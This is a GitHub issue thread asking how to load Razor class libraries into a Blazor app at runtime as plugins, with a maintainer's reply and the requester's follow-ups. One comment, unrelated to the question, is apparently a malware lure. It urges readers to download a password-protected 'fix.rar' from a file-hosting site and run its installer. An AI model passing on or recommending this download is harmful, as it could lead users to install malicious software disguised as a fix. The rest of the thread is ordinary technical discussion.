### ISSUE TITLE
[Blazor] Dynamically Load Library Like Mvc

### ISSUE THREAD

**Issue by SunSi12138** [dotnet/aspnetcore#57530]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Is your feature request related to a problem? Please describe the problem.

I'm trying to dynamically add pages to my blazor app.

In mvc, it's easily to add a api controller or razor page by using ApplicationPart

But I dont find a way to do this in blazor

I found these relevant links but none of them provide a full solution:
https://learn.microsoft.com/en-us/answers/questions/641973/how-to-load-razor-class-library-at-runtime-(as-plu
https://learn.microsoft.com/en-us/aspnet/core/blazor/webassembly-lazy-load-assemblies?view=aspnetcore-8.0

I think plugin system is a very impressive feature to modern ui framework

will you consider developing this?

### Describe the solution you'd like

a api like ApplicationPart to easily add razor class library to runtime

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by javiercn** [comment]
@SunSi12138 thanks for contacting us.

You can use `AddAdditionalAssemblies` after `MapRazorComponents` for that.

**Comment by SunSi12138** [comment]
How can I call AddAdditionalAssemblies from blazor page?
In this case, it need a restart to call AddAdditionalAssemblies after app
`app.MapRazorComponents<App>()
    .AddInteractiveServerRenderMode()
    .AddAdditionalAssemblies(assemblies);`


I'm  more expecting to a flexiable way to construct a pluginable application like runtime update page 
this feature would also be very helpful for application like maui blazor to hot update

**Comment by SunSi12138** [comment]
I checked this:
https://github.com/dotnet/runtime/issues/76554

and it successfully works in my project(though only in server model)
but only in a component level, I would expect a more high level plugin
